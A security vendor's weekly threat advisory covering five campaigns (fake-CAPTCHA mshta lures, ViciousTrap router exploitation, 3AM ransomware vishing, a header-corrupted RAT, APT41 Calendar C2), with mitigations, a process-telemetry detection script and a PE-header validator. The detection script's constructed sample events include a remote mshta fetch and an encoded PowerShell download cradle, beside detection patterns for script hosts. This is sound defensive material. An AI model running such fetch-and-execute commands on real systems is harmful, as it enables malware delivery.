Multistage CAPTCHA-Based Attacks Use mshta.exe to Deliver RATs and Stealers


In the past week, critical cybersecurity threats have emerged, ranging from an actively exploited router vulnerability to phishing and social-engineering campaigns that abuse legitimate Windows and cloud services. Recent cybersecurity incidents include:

  1. Multistage CAPTCHA-Based Attacks Use mshta.exe to Deliver RATs and Stealers
  2. ViciousTrap Exploits Router Flaw to Build Global Honeypot Network for AitM Attacks
  3. 3AM Ransomware Leverages Vishing and Email Bombing for Data Theft and RA
  4. Windows RAT Evades Detection Using Corrupted PE and DOS Headers
  5. Google Calendar Exploited by APT41 for Malware Command-and-Control Operations

These developments underscore the urgent need for organizations to stay vigilant, apply security updates promptly, and constrain the legitimate tools that these campaigns abuse.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.


1. Multistage CAPTCHA-Based Attacks Use mshta.exe to Deliver RATs and Stealers

A new phishing campaign exploits fake CAPTCHA pages to trick users into pasting malicious commands into the Windows Run dialog. Spread through SEO poisoning, malvertising, and phishing emails with urgent subject lines, the attack delivers obfuscated JavaScript inside files that carry MP3 or PDF extensions but are actually HTA content, which mshta.exe runs regardless of the file name. These scripts execute in memory via mshta.exe and PowerShell, deploying payloads such as Lumma Stealer, AsyncRAT, and XWorm. The malware abuses legitimate processes, uses DLL sideloading, and even spins up local web servers to avoid detection, posing serious risks to data integrity and operational continuity. Because the victim launches the first stage from the Run dialog, the initial process typically appears as mshta.exe or powershell.exe started by explorer.exe with a remote URL as its argument, which bypasses mail and browser download controls entirely.

Recommendations to mitigate this threat include disabling the Windows Run dialog (the NoRun Explorer policy), enforcing least privilege access, blocking risky file-sharing platforms, and monitoring clipboard and process behavior. Note that disabling Run only removes one paste target; the same lure works in a PowerShell or Terminal window or the File Explorer address bar, so the durable controls are constraining mshta.exe and PowerShell for ordinary users and alerting on script hosts launched from explorer.exe with a URL argument. Harden browsers, enable memory protection, and implement application whitelisting. Conduct threat hunting for abnormal script activity (commands entered into the Run dialog persist in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, a quick artefact to check on a suspect host) and train users to recognize suspicious CAPTCHAs or command prompts. Finally, use network segmentation to restrict lateral movement and limit the blast radius of an infection.
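The process-behavior monitoring recommended above can be expressed as a small rule set over process-creation telemetry. The following is an added example written for this advisory, not code from the original campaign report or from any vendor; it runs over constructed Sysmon-style Event ID 1 records (Image, ParentImage, CommandLine) in a made-up key=value format, and the sample command lines, domains and paths are invented. The scoring logic generalizes beyond mshta.exe to the other script hosts ClickFix variants use.

```python
"""Detect the paste-into-Run chain from process-creation telemetry.

Added example, not from the original advisory. It consumes constructed
Sysmon-style Event ID 1 records (Image, ParentImage, CommandLine) in a
simple key=value|key=value format; real input would come from Sysmon,
EDR, or Security event 4688 with command-line auditing enabled.
"""
import re

# LOLBins the campaign uses to fetch and run remote script content.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
# Parents that mean a human typed the command (the Win+R box is hosted by explorer.exe).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# mshta runs HTA content regardless of extension; the lure hides it as media or documents.
DISGUISED_EXT_RE = re.compile(r"\.(mp3|pdf|png|jpg|txt)(\b|$)", re.IGNORECASE)
ENCODED_PS_RE = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)


def parse_event(line):
    """'Key=value|Key=value' -> dict (constructed format for this example)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return the list of reasons an event looks like the ClickFix first stage."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if image not in SCRIPT_HOSTS:
        return reasons
    if URL_RE.search(cmd):
        reasons.append("remote-url-argument")
    if image == "mshta.exe" and DISGUISED_EXT_RE.search(cmd):
        reasons.append("mshta-non-hta-extension")
    if ENCODED_PS_RE.search(cmd):
        reasons.append("encoded-powershell")
    # A script host started by an interactive shell with one of the above is the strongest signal.
    if reasons and parent in INTERACTIVE_PARENTS:
        reasons.append("interactive-parent")
    return reasons


def detect(lines):
    """Return [(image basename, reasons)] for every event that scores."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = score_event(event)
        if reasons:
            hits.append((basename(event.get("Image", "")), reasons))
    return hits


# Constructed sample events: two mimic the campaign, two are routine administration.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=mshta https://cdn.example.invalid/verify.mp3",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Program Files\Vendor\app.exe"
    r"|CommandLine=mshta C:\Program Files\Vendor\ui\setup.hta",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\svchost.exe"
    r"|CommandLine=powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
]

if __name__ == "__main__":
    for image, reasons in detect(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(reasons)}")
```

Only the two campaign-style events score; the vendor HTA launched from an installed application and the scheduled inventory script do not, which is the point of keying on the combination of script host, remote argument and interactive parent rather than on mshta.exe alone. In production the same rule is cheap to run as a SIEM correlation, and a hit should be followed by a check of the RunMRU key on the host.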

2. ViciousTrap Exploits Router Flaw to Build Global Honeypot Network for AitM Attacks

A threat group dubbed ViciousTrap has exploited CVE-2023-20118 in Cisco Small Business RV routers, compromising over 5,300 edge devices across 84 countries. Using a custom shell script named NetGhost, the attackers redirect network traffic for adversary-in-the-middle (AitM) attacks while evading detection. The infection chain leverages ftpget and wget to download and execute NetGhost, which then removes itself to avoid forensic trails. The compromised devices include routers, VPNs, and DVRs from over 50 brands. Evidence suggests the campaign may be linked to Chinese-speaking actors and shares infrastructure with PolarEdge and GobRAT campaigns.

Recommendations to mitigate this threat start with the affected hardware itself: CVE-2023-20118 affects end-of-life Cisco RV016, RV042, RV042G, RV082, RV320 and RV325 routers, for which Cisco has stated that no fix will be released, so the remediation is replacement, or at minimum disabling remote management on the WAN interface until the devices are retired. Block outbound traffic to known malicious IPs (e.g., 101.99.91[.]151), and monitor for shell script activity involving ftpget and wget. Replace outdated devices, restrict access to router interfaces via IP whitelisting, and inspect for port redirection behaviors. Use internal honeypots and centralized syslog logging to detect lateral movement and AitM patterns early.

3. 3AM Ransomware Leverages Vishing and Email Bombing for Data Theft and RA

A 3AM ransomware affiliate launched a stealthy campaign combining email bombing and spoofed IT support calls to socially engineer employees into granting remote access. Once trust was gained, victims were tricked into using Microsoft Quick Assist to enable remote control. The attackers then delivered a ZIP archive containing QEMU virtualization, a malicious VBScript, and a Windows 7 disk image with the QDoor backdoor, enabling covert activity in an isolated virtual machine. Over nine days, 868 GB of data was exfiltrated via GoodSync to Backblaze, while Sophos tools blocked further lateral movement and ransomware deployment.

Recommendations to mitigate this threat include training users to identify vishing and spoofed IT outreach, disabling Quick Assist (it can be removed as a Windows optional capability or blocked with AppLocker/WDAC), and monitoring for QEMU or remote management tool misuse. Restrict PowerShell usage to signed scripts, enforce MFA, and audit admin accounts regularly. Limit VM and RDP usage, block unauthorized remote tools, and deploy XDR and IPS systems to detect C2 traffic and prevent data exfiltration attempts. Note that a guest VM running inside QEMU has its own network stack, so host-based EDR sees only the qemu process and its traffic; alerting on the appearance of QEMU binaries on workstations is the more reliable signal.

4. Windows RAT Evades Detection Using Corrupted PE and DOS Headers

Fortinet uncovered a stealthy malware campaign using a corrupted 64-bit PE file with intentionally malformed DOS and PE headers to evade static analysis. Delivered via PowerShell and PsExec, the malware ran in memory under dllhost.exe, functioning as a multi-threaded Remote Access Trojan (RAT). It communicated over TLS with the domain rushpapers[.]com, remaining dormant until triggered and enabling concurrent attacker sessions for prolonged access. Key functions included screenshot capture, service manipulation, and acting as a local server for attacker callbacks.

Recommendations to mitigate this threat include enforcing script execution controls for PowerShell and PsExec, performing regular memory forensics using EDR or dump analysis tools, and validating PE headers to flag malformed binaries. The on-disk validation point needs care: a file with deliberately broken DOS and PE headers fails to parse, and many static scanners then simply skip it, so the useful verdict is "looks like a PE but does not parse", not just "valid or not". In memory, look for private executable regions inside dllhost.exe that are not backed by a file on disk. Monitor encrypted outbound traffic for anomalous TLS behavior, and segment networks to restrict lateral movement. Patch and securely configure remote access tools, and hunt for unusual activity from trusted but abused processes like dllhost.exe.
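The header validation recommended above is worth making explicit, because the interesting outcome is the third verdict, not a pass/fail. The following is an added example, not Fortinet's tooling or anything from the campaign: it classifies a byte blob as a valid PE, not a PE, or PE-like but malformed, and builds its own tiny test corpus in memory (a minimal PE32+ header set plus three corruptions of the kind the RAT relies on), so nothing is read from disk and no real sample is involved.

```python
"""Classify a byte blob as a valid PE, not a PE, or PE-like but malformed.

Added example, not Fortinet's tooling. A scanner that only asks "does this
parse as a PE?" quietly skips the deliberately broken files described above,
so the useful verdict for triage is the third one: an object that carries PE
artefacts but whose DOS/NT headers fail basic sanity checks. The sample
binaries are constructed in this file; nothing is read from disk.
"""
import struct

PE_SIGNATURE = b"PE\x00\x00"
VALID_MACHINES = {0x014C, 0x8664, 0x01C0, 0xAA64}   # i386, x64, ARM, ARM64
OPT_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
# Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
FILE_HEADER = "<HHIIIHH"


def classify_pe(data):
    """Return (verdict, detail) where verdict is 'valid', 'malformed' or 'not-pe'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        # The DOS stub may have been wiped; a PE signature or section name further in is still a tell.
        if PE_SIGNATURE in data[:4096] or b".text\x00" in data[:4096]:
            return ("malformed", "no MZ header but PE artefacts present")
        return ("not-pe", "")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # Need signature (4) + file header (20) + optional-header magic (2) to be readable.
    if e_lfanew < 0x40 or e_lfanew + 4 + 20 + 2 > len(data):
        return ("malformed", f"e_lfanew 0x{e_lfanew:x} out of range")
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        return ("malformed", "PE signature missing at e_lfanew")
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from(FILE_HEADER, data, e_lfanew + 4)
    if machine not in VALID_MACHINES:
        return ("malformed", f"unknown machine 0x{machine:x}")
    if nsections == 0 or nsections > 96:
        return ("malformed", f"implausible section count {nsections}")
    opt_off = e_lfanew + 4 + 20
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic not in OPT_MAGIC:
        return ("malformed", f"optional header magic 0x{magic:x}")
    if opt_off + opt_size + nsections * 40 > len(data):
        return ("malformed", "section table runs past end of data")
    return ("valid", OPT_MAGIC[magic])


def build_minimal_pe64():
    """Smallest header set that passes every check above (no code, one empty section)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew: NT headers right after DOS header
    file_hdr = struct.pack(FILE_HEADER, 0x8664, 1, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                 # PE32+ magic
    section = bytearray(40)
    section[:5] = b".text"
    return bytes(dos) + PE_SIGNATURE + file_hdr + bytes(opt) + bytes(section)


def build_samples():
    """Constructed corpus: one clean PE and corruptions of the kind the RAT relies on."""
    good = build_minimal_pe64()
    dos_wiped = b"\x00" * 0x40 + good[0x40:]               # DOS header zeroed, NT headers intact
    bad_lfanew = bytearray(good)
    struct.pack_into("<I", bad_lfanew, 0x3C, 0x7FFFFFF0)  # e_lfanew points far past the data
    no_sig = bytearray(good)
    no_sig[0x40:0x44] = b"\x00" * 4                        # PE signature stripped, rest intact
    return {
        "clean": good,
        "dos-wiped": dos_wiped,
        "bad-lfanew": bytes(bad_lfanew),
        "no-signature": bytes(no_sig),
        "text-file": b"not a binary at all\n" * 20,
    }


def scan(samples):
    """Map sample name -> verdict."""
    return {name: classify_pe(blob)[0] for name, blob in samples.items()}


if __name__ == "__main__":
    for name, blob in build_samples().items():
        print(f"{name:14s} {classify_pe(blob)}")
```

Run over files written to disk, a "malformed" verdict is the triage trigger for something most scanners would have discarded as noise; run over dumped private executable regions of a process such as dllhost.exe it identifies the in-memory image whose headers were stripped or rebuilt. The checks are deliberately shallow (signature, machine, section count, optional-header magic, table bounds) so they cannot themselves be crashed by a hostile header.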

5. Google Calendar Exploited by APT41 for Malware Command-and-Control Operations

Chinese state-sponsored group APT41 deployed a stealthy campaign leveraging Google Calendar as a command-and-control (C2) channel for its malware TOUGHPROGRESS. The attack began with spear-phishing emails containing ZIP files that hid malicious LNK shortcuts disguised as PDFs. Once launched, the chain executed entirely in memory using PLUSDROP and PLUSINJECT, culminating in TOUGHPROGRESS, which used encrypted “zero-minute” calendar events for C2 communication. Google has since dismantled the malicious Calendar and associated infrastructure.

Recommendations to mitigate this threat include blocking unnecessary cloud services like calendar APIs, auditing cloud access logs, and monitoring for suspicious LNK and ZIP files. Because TOUGHPROGRESS talks to Google's own infrastructure, its C2 traffic terminates at legitimate Google domains over TLS and will not stand out on destination reputation alone; pair any blocking with process-level telemetry (which binary is reaching Google Calendar, and whether it is a browser) rather than relying on domain filtering. Deploy behavior-based endpoint detection to catch memory-only malware and process hollowing. Implement strong email filtering and sandboxing. Track known APT41 indicators and restrict interactions with unauthorized Google Workspace resources. These steps help limit exposure to stealthy malware exploiting legitimate platforms for covert operations.

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
